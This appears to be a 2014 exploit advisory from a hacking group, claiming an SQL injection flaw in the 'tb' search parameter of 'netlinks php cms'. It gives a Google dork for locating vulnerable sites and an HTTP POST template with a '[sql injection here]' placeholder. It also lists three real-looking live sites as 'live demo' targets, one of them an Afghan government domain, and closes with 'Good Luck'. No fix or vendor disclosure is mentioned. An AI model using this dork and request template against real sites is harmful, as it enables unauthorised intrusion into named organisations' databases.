010101010101010101010101010101010101010101010101010101010
0 0
1 Iranian Datacoders Security Team 2010 - 2014 1
0 0
1 WWW.DataCoders.Org 1
010101010101010101010101010101010101010101010101010101010
############################################
# Exploit Title: netlinks php cms SQL Injection Vulnerability #
# Date: 12/04/2014 #
# Author: H-SK33PY #
# Vendor Link: http://www.netlinks.af/ #
# Platform / Tested on: php/linux cpanel #
# Google Dork: intext:"powered by netlinks" site:af #
# Category: webapplications #
# Code : [SQL injection] #
# Our Website: http://www.datacoders.org/ #
#############################################
this bug is in "tb" parameter in search section.
example :
http://Site/search
POST /search HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
tb=as[sql injection here]&btn=Search+
Live demo :
http://www.hdgroup.af/search
POST: tb=as[sql injection here]&btn=Search+
http://www.nooragrogroup.com/search
POST: tb=as[sql injection here]&btn=Search+
http://www.fdrc.gov.af/search
POST: tb=as[sql injection here]&btn=Search+
Good Luck
###############################################
# #
# We Are: H-SK33PY | Immortal Boy | D4rkC0d3 | Noter | M4st3r4N0nY | Stormy | M0ri #
# And All Iranian DataCoders Members #
# Special TNX to Ahmadbady , Satanic2000 , Old Joker , S3Ri0uS , Pejvak #
# l3l4ck.$c0rpi0n , Hellboy , A.Cr0x , #
# #
# Don't Forget => WwW.DataCoders.Org #
###############################################